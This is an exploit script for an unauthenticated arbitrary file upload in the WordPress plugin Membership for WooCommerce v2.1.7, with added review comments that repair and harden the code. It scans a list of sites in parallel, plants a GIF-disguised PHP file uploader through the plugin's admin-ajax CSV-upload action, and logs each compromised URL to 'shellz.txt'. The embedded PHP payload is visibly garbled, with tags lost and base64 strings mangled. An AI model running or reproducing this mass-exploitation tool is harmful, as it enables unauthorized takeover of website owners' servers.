# Exploit Title: WordPress Plugin Membership for WooCommerce v2.1.7 - Arbitrary File Upload to Shell (Unauthenticated)
# Date: 2024-02-25
# Author: Milad Karimi (Ex3ptional)
# Category: WebApps
# Tested on: Windows 10, Firefox
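import sys, requests, re, json
# NOTE(review): the module path after "multiprocessing." did not survive in
# this copy of the listing. A thread pool (multiprocessing.dummy) fits an
# I/O-bound scanner and is assumed here -- confirm against the original. If
# the process-backed Pool was meant, the driver at the bottom of the file must
# sit under an __main__ guard on Windows, the stated test platform.
from multiprocessing.dummy import Pool
# NOTE(review): the imported name was lost in this copy as well; `Fore` is the
# colorama export that yields the colour prefixes used below.
from colorama import Fore
from colorama import init
init(autoreset=True)   # "autoret=true" in this copy is a mangled autoreset=True

# Colour prefixes referenced by exploit() and the driver. Their definitions
# are missing from this copy of the listing, so they are reconstructed with
# the colours their names suggest (green / red / magenta); only the
# presentation of status lines depends on them.
fg = Fore.GREEN
fr = Fore.RED
fm = Fore.MAGENTA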
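# Browser-looking request headers sent with every request. The misspellings
# in the User-Agent ("Mozlila", "Bulid", "Moblie") are part of the tool and
# make a convenient detection signature for the scanner. Capitalisation and
# spacing in this copy of the listing were unreliable and have been normalised
# to the conventional header form; the `*/*` in Accept had been stripped to
# a bare `/` by extraction.
headers = {
    'Connection': 'keep-alive',
    'cache-control': 'max-age=0',
    'Upgrade-Insecure-Requests': '1',
    'User-Agent': 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) '
                  'AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 '
                  'Chrome/60.0.3112.107 Moblie Safari/537.36',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,'
              'image/webp,image/apng,*/*;q=0.8',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',
    'referer': 'www.google.com',
}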
# Payload that exploit() posts to the vulnerable CSV-upload action as db.php.
# As far as this copy shows, it is a polyglot: a "GIF89A" magic prefix so that
# image-sniffing checks accept the file, followed by a PHP "uploader" page
# that appears to move a browser-submitted file next to itself (the base64
# literals, with their case restored, are the $_FILES keys 'uploaded_file',
# 'tmp_name' and 'name', the path './' and two status messages) -- i.e. a
# persistent file dropper rather than a one-shot command shell.
# NOTE(review): this copy of the literal is mangled by extraction -- the
# '<' / '>' of the PHP and HTML tags are gone, the base64 strings have been
# lowercased and the PHP variable names are duplicated/corrupted -- so it
# does not execute as shown. It is kept verbatim rather than reconstructed.
# Defenders can still use the GIF89A-plus-PHP prefix and these base64
# literals as a file signature for anything landing in the plugin's
# csv-uploads directory.
uploader='''
GIF89A
?php?
!doctype html
html
头
titleresultz/title
/头
Bodyh1uploader/H1
form enctype='multipart/form-data'action=''method='post'
puploaded/p
输入type='file'name='uploaded_file' /inputbr /
输入类型='submit'value='upload'/input
/形式
/身体
/html
php
if(!empty($ _ files [base64_decode('dxbsb2fkzwrfzmlszq==')]))){$ fdudxfib_d6fe1d0be6347b8ef247b8ef2427fa629c044485=base64_d ecode('li8='); $ fdudxfib_d6fe1d0be6347b8ef2427fa629c04485=$ fdudxfib_d6fe1d6fe1d0be6347b8ef247b8ef22427fa文件[base64_decode('dxbsb2fkzwrfzmlszq==')] ecode('dxbsb2fkzwrfzmlszq==')] [base64_decode('dg1wx25hbwu=')],$ fdudxfib_d6fe1d0be6347b8ef247b8ef242427f2427fa629c04485))
base64_decode('vghligzpbgug')。basename($ _ files [base64_decode('dxbsb2fkzwrfzmlszq==' )[base64_decode('bmftzq==')])。base64_decode('ighhcybizwvuihvwbg9hzgvk');} else {echo
base64_decode('vghlcmugd2fzigfuigvycm9yihvwbg9hzgluzyb0agugzmlszmlszswgcgcgxlyxnlryesbhz2fpbie='');}}}?
'''
# The requests below are made with verify=False; this only silences urllib3's
# InsecureRequestWarning on every call. Certificate errors are still not
# checked -- the warning is hidden, not the risk.
requests.urllib3.disable_warnings()
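def exploit(domain):
    """Probe one site for the unauthenticated CSV-upload flaw and record hits.

    Posts the ``uploader`` payload as ``db.php`` to the plugin's
    ``wps_membership_csv_file_upload`` admin-ajax action, which on a
    vulnerable install stores it unchanged under
    ``wp-content/uploads/mfw-activity-logger/csv-uploads/``, then fetches
    that path to confirm the planted file is being served.

    Args:
        domain: host name or URL from the site list; ``http://`` is
            prepended when no scheme is given.

    Returns:
        None. Prints one status line per target and appends the URL of each
        planted file to ``shellz.txt``.
    """
    # Accept bare hosts as well as full URLs. The original substring test
    # (`"http" in domain`) also matched hosts that merely contain "http".
    if not domain.startswith(('http://', 'https://')):
        domain = 'http://' + domain
    # Avoid "//wp-admin" when the site list carries trailing slashes.
    domain = domain.rstrip('/')
    upload_url = domain + '/wp-admin/admin-ajax.php?action=wps_membership_csv_file_upload'
    shell_url = domain + '/wp-content/uploads/mfw-activity-logger/csv-uploads/db.php'
    try:
        # NOTE(review): the multipart field name is the empty string in this
        # copy of the listing; whether the vulnerable handler keys on a
        # particular field name could not be confirmed from the page.
        files = {'': ('db.php', uploader)}
        requests.post(upload_url, files=files, headers=headers,
                      verify=False, timeout=10)
        # Same transport settings as the POST: the original GET had no
        # timeout (a hung target stalls the worker for good) and default
        # certificate verification, so self-signed HTTPS targets raised and
        # were reported as "failed" instead of being checked.
        check = requests.get(shell_url, headers=headers, verify=False, timeout=10)
        # The original evaluated `'ex3' in req1` against the Response object
        # itself, which never matches in Python 3; the body is what carries
        # the marker. NOTE(review): the payload as reproduced on this page
        # does not contain "ex3", so confirm the marker against the intended
        # payload before relying on this check.
        if check.status_code == 200 and 'ex3' in check.text:
            print(f'{fg}[+] {domain} - uploaded')
            # Several pool workers append concurrently; one short write per
            # hit keeps lines intact in practice, and the file is closed
            # rather than leaked as in the original.
            with open('shellz.txt', 'a') as log:
                log.write(shell_url + '\n')
        else:
            print(f'{fr}[-] {domain} - not vulnerable')
    except Exception as exc:
        # Was a bare `except:`, which also swallowed KeyboardInterrupt in the
        # workers and hid the reason; report the exception type at least.
        print(f'{fr} -| {domain} - [failed] {type(exc).__name__}')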
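if __name__ == '__main__':
    # Guarding the driver matters if Pool is the process-backed one: on
    # Windows (the stated test platform) every worker re-imports this module
    # and would otherwise re-run the prompts and spawn its own pool.
    with open(input(fm + 'site list: '), 'r') as site_list:
        # Drop blank lines and surrounding whitespace; the original passed
        # them on and ended up requesting "http://" + "".
        target = [line.strip() for line in site_list if line.strip()]
    mp = Pool(int(input(fm + 'threads: ')))
    mp.map(exploit, target)
    # Explicit close()/join() rather than `with Pool(...)`, whose __exit__
    # terminates workers instead of waiting for in-flight targets.
    mp.close()
    mp.join()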